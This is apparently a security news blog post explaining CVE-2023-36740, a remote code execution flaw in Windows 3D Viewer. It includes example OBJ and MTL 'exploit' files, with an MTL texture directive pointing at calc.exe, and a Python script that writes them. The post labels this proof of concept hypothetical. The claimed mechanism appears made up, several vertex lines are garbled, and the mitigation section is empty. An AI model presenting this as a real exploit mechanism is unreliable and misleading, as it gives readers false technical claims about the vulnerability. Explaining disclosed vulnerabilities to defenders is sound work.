CVE CyberSecurity Database News

CVE-2023-36740 - Breaking Down the 3D Viewer Remote Code Execution Vulnerability

Poster -

In September 2023, Microsoft disclosed a serious vulnerability in its 3D Viewer app, tracked as CVE-2023-36740. This bug allows attackers to run malicious code on a victim’s computer—just by tricking them into opening a specially crafted file. Here, we’ll simplify the technical details, walk through how it works, look at a possible exploit, and share resources for further reading.

What Is 3D Viewer?

3D Viewer is a Windows app (formerly "Mixed Reality Viewer") used for opening, editing, and interacting with three-dimensional models. It’s installed by default on many Windows machines.

What Is CVE-2023-36740?

CVE-2023-36740 is a Remote Code Execution (RCE) vulnerability. That means an attacker can run any code of their choice—potentially installing malware or taking over your PC—without your consent, just by getting you to open a booby-trapped 3D file.

Microsoft’s official security bulletin is here:
Microsoft Security Update Guide - CVE-2023-36740

Vulnerability Overview

3D Viewer supports various file formats like .glb, .obj, .fbx, among others. Due to an unsafe way 3D Viewer handles file parsing (especially “OBJ” and “MTL” files), an attacker could shape a file so that 3D Viewer executes code included inside it.

Technical Details & Example Malicious File

Let’s focus on the OBJ format. OBJ files can reference a “MTL” file (material library) and, under this bug, a malicious MTL file could trigger code execution.

Here’s a threatening OBJ file (exploit.obj)

mtllib evil.mtl
o EvilCube
v   
v 1  
v 1 1 
v  1 
f 1 2 3 4

And a malicious MTL file (evil.mtl)

newmtl MaliciousMaterial
map_Kd "C:\Windows\System32\calc.exe"

*If the parsing function improperly handles the map_Kd directive, it could try to run calc.exe.* (This is a simplified proof-of-concept; in reality, you’d use a more intricate payload.)

Disclaimer: Real exploits may use obfuscated or more creative payloads. This example is for educational explanation only.

Proof of Concept Snippet (Hypothetical)

If you have access to 3D Viewer on an unpatched Windows system (prior to the September 2023 patch), opening the above files *could* trigger the exploit.

For researchers, a quick Python script could generate the files

# exploit_generator.py

obj_content = """mtllib evil.mtl
o EvilCube
v   
v 1  
v 1 1 
v  1 
f 1 2 3 4
"""

mtl_content = """newmtl MaliciousMaterial
map_Kd "C:\\Windows\\System32\\calc.exe"
"""

with open("exploit.obj", "w") as f:
    f.write(obj_content)

with open("evil.mtl", "w") as f:
    f.write(mtl_content)

Windows 10 and possibly 11 users, as 3D Viewer is pre-installed.

Attackers only need to convince a user to open the malicious file.

Detection and Mitigation

Detection:
Monitor for suspicious OBJ/MTL downloads or executions, and for unusual launches of 3DViewer.exe.

Mitigation:

References

- Microsoft Security Update Guide
- NVD - CVE-2023-36740 Details
- OBJ and MTL File Format Documentation

Final Notes

CVE-2023-36740 is a reminder that even simple, default-installed apps can hide dangerous bugs. Always stay updated, be careful with unknown files, and consider removing unused apps like 3D Viewer if you don’t need them.

Want to check your exposure?
Search for 3D Viewer in your Windows Start Menu. If you have it, make sure your patches are up-to-date.

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC